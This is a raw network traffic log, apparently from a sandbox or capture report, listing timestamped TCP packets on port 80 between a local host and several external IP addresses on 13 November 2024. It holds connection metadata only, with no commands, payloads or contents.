                                                                                      Nov 13, 2024 09:27:40.690731049 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:41.017846107 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:41.018006086 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:41.032186985 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:41.037049055 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.064431906 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.064449072 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.064512968 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.272655010 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.272710085 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.272761106 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.482034922 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482060909 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482078075 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482090950 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.482315063 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.483247995 CET8058983104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:42.483400106 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:42.534775972 CET5898380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.553097963 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.558041096 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:43.558126926 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.567522049 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:43.572403908 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.597100019 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.597152948 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.597203970 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:44.792308092 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.792363882 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.792432070 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:44.987910986 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.987951040 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.987987041 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.988006115 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:44.990034103 CET8058999104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:44.990091085 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:45.081419945 CET5899980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.099471092 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.104316950 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.104409933 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.113253117 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:46.118179083 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118192911 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118207932 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118292093 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118304968 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118313074 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118366957 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118381023 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:46.118392944 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160398960 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160418034 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160509109 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.160557032 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.206604004 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.350872993 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.350899935 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.350977898 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.540983915 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541006088 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541022062 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541038990 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.541078091 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.541078091 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.542181015 CET8059009104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:47.542227983 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:47.628257990 CET5900980192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.646856070 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.651788950 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:48.651951075 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.656856060 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:48.661876917 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170633078 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170670033 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170703888 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170758009 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170793056 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170828104 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170835972 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170855045 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170856953 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.170870066 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170902014 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.170996904 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.171034098 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.171065092 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.171072006 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.171103001 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.177561998 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177597046 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177632093 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177647114 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.177668095 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177716017 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.177804947 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177850008 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177886009 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.177894115 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.222357988 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257474899 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257544994 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257580996 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257612944 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257658958 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257693052 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257723093 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257723093 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257745028 CET8059023104.21.14.183192.168.2.4
                                                                                      Nov 13, 2024 09:27:50.257749081 CET5902380192.168.2.4104.21.14.183
                                                                                      Nov 13, 2024 09:27:50.257777929 CET8059023104.21.14.183192.168.2.4
Nov 13, 2024 09:27:50.257814884 CET  80  59023  104.21.14.183  192.168.2.4
Nov 13, 2024 09:27:50.257819891 CET  59023  80  192.168.2.4  104.21.14.183
Nov 13, 2024 09:27:50.257900953 CET  80  59023  104.21.14.183  192.168.2.4
Nov 13, 2024 09:27:50.257942915 CET  59023  80  192.168.2.4  104.21.14.183
Nov 13, 2024 09:27:50.258377075 CET  80  59023  104.21.14.183  192.168.2.4
Nov 13, 2024 09:27:50.258615017 CET  80  59023  104.21.14.183  192.168.2.4
Nov 13, 2024 09:27:50.258665085 CET  59023  80  192.168.2.4  104.21.14.183
Nov 13, 2024 09:27:50.259215117 CET  80  59023  104.21.14.183  192.168.2.4
Nov 13, 2024 09:27:50.259263992 CET  59023  80  192.168.2.4  104.21.14.183
Nov 13, 2024 09:27:50.260874987 CET  59023  80  192.168.2.4  104.21.14.183
Nov 13, 2024 09:27:50.266110897 CET  80  59023  104.21.14.183  192.168.2.4
Nov 13, 2024 09:27:55.315651894 CET  59058  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:55.320631027 CET  80  59058  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:55.320693016 CET  59058  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:55.328007936 CET  59058  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:55.332895041 CET  80  59058  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:55.994162083 CET  80  59058  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:56.034507990 CET  59058  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:56.048886061 CET  80  59058  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:56.048944950 CET  59058  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:56.831547976 CET  59058  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:57.849940062 CET  59069  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:57.854918957 CET  80  59069  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:57.855096102 CET  59069  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:57.863544941 CET  59069  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:57.868521929 CET  80  59069  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:58.555423975 CET  80  59069  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:58.597029924 CET  59069  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:58.599807024 CET  80  59069  67.223.117.142  192.168.2.4
Nov 13, 2024 09:27:58.599889994 CET  59069  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:27:59.378449917 CET  59069  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:00.396677017 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:00.401555061 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.401627064 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:00.412889004 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:00.417800903 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417839050 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417846918 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417853117 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417885065 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417936087 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417943001 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.417973995 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:00.418028116 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:01.387176991 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:01.387265921 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:01.387326002 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:01.387388945 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:01.387428999 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:01.387871981 CET  80  59085  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:01.387912989 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:01.925231934 CET  59085  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:02.943579912 CET  59101  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:02.948672056 CET  80  59101  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:02.948749065 CET  59101  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:02.955741882 CET  59101  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:02.960638046 CET  80  59101  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:03.628504992 CET  80  59101  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:03.666904926 CET  80  59101  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:03.667072058 CET  59101  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:03.667804956 CET  59101  80  192.168.2.4  67.223.117.142
Nov 13, 2024 09:28:03.672765017 CET  80  59101  67.223.117.142  192.168.2.4
Nov 13, 2024 09:28:08.693131924 CET  59102  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:08.698095083 CET  80  59102  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:08.698158979 CET  59102  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:08.706906080 CET  59102  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:08.711852074 CET  80  59102  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:09.323456049 CET  80  59102  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:09.323525906 CET  59102  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:10.222332954 CET  59102  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:10.227343082 CET  80  59102  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:11.240638018 CET  59103  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:11.245815039 CET  80  59103  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:11.245903969 CET  59103  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:11.254400015 CET  59103  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:11.259238958 CET  80  59103  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:11.872092962 CET  80  59103  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:11.872164011 CET  59103  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:12.769078016 CET  59103  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:13.079747915 CET  80  59103  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.786799908 CET  59104  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:13.791799068 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.791889906 CET  59104  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:13.799452066 CET  59104  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:13.804526091 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804557085 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804589987 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804616928 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804645061 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804696083 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804723024 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804749966 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:13.804776907 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:15.300345898 CET  59104  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:15.305943012 CET  80  59104  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:15.306006908 CET  59104  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:16.318320036 CET  59105  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:17.193919897 CET  80  59105  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:17.194183111 CET  59105  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:17.199978113 CET  59105  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:17.205073118 CET  80  59105  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:17.826349974 CET  80  59105  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:17.826849937 CET  80  59105  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:17.827028990 CET  59105  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:17.829051971 CET  59105  80  192.168.2.4  3.33.130.190
Nov 13, 2024 09:28:17.833914995 CET  80  59105  3.33.130.190  192.168.2.4
Nov 13, 2024 09:28:22.866614103 CET  59106  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:22.871520996 CET  80  59106  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:22.871696949 CET  59106  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:22.883877039 CET  59106  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:22.888850927 CET  80  59106  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:23.952790022 CET  80  59106  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:24.003472090 CET  59106  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:24.192914963 CET  80  59106  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:24.193121910 CET  59106  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:24.394172907 CET  59106  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:25.412266970 CET  59107  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:25.417726040 CET  80  59107  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:25.418204069 CET  59107  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:25.425424099 CET  59107  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:25.430418968 CET  80  59107  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:26.498707056 CET  80  59107  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:26.550389051 CET  59107  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:26.743676901 CET  80  59107  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:26.743788958 CET  59107  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:26.950336933 CET  59107  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:27.961184978 CET  59108  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:27.966440916 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.966689110 CET  59108  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:27.977755070 CET  59108  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:27.982939959 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984385014 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984400988 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984412909 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984425068 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984436035 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984447956 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984458923 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:27.984589100 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:29.091928959 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:29.144201040 CET  59108  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:29.362560034 CET  80  59108  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:29.362736940 CET  59108  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:29.488096952 CET  59108  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:30.506159067 CET  59109  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:30.511358023 CET  80  59109  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:30.511626005 CET  59109  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:30.516690016 CET  59109  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:30.521501064 CET  80  59109  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:31.599441051 CET  80  59109  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:31.644067049 CET  59109  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:31.843637943 CET  80  59109  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:31.843741894 CET  59109  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:31.844469070 CET  59109  80  192.168.2.4  113.20.119.31
Nov 13, 2024 09:28:31.849313974 CET  80  59109  113.20.119.31  192.168.2.4
Nov 13, 2024 09:28:37.254849911 CET  59110  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:37.259731054 CET  80  59110  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:37.259804010 CET  59110  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:37.267333984 CET  59110  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:37.272367954 CET  80  59110  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:38.252922058 CET  80  59110  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:38.300688982 CET  59110  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:38.457912922 CET  80  59110  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:38.458091021 CET  59110  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:38.769227028 CET  59110  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:39.787014008 CET  59111  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:39.792035103 CET  80  59111  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:39.792260885 CET  59111  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:39.799820900 CET  59111  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:39.804672003 CET  80  59111  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:40.792073965 CET  80  59111  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:40.832104921 CET  59111  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:40.992166042 CET  80  59111  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:40.992499113 CET  59111  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:41.300518036 CET  59111  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:42.318381071 CET  59112  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:42.323422909 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.323543072 CET  59112  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:42.330967903 CET  59112  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:42.335863113 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.335916042 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.335927963 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.335939884 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.335962057 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.336081028 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.336096048 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.336169958 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:42.336219072 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:43.362481117 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:43.409754038 CET  59112  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:43.581118107 CET  80  59112  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:43.581258059 CET  59112  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:43.831679106 CET  59112  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:44.854983091 CET  59113  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:44.860085011 CET  80  59113  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:44.860234022 CET  59113  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:44.866463900 CET  59113  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:44.871387959 CET  80  59113  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:45.854818106 CET  80  59113  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:45.910008907 CET  59113  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:46.065396070 CET  80  59113  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:46.065546989 CET  59113  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:46.066365957 CET  59113  80  192.168.2.4  47.129.103.185
Nov 13, 2024 09:28:46.071209908 CET  80  59113  47.129.103.185  192.168.2.4
Nov 13, 2024 09:28:51.125096083 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.130554914 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.130764008 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.137970924 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.143369913 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797152996 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797168016 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797214985 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797221899 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797225952 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797233105 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797303915 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797312021 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797319889 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797362089 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.797362089 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.797363043 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.797456980 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.797517061 CET  59114  80  192.168.2.4  38.47.237.27
Nov 13, 2024 09:28:51.802371025 CET  80  59114  38.47.237.27  192.168.2.4
Nov 13, 2024 09:28:51.802437067 CET  80  59114  38.47.237.27  192.168.2.4
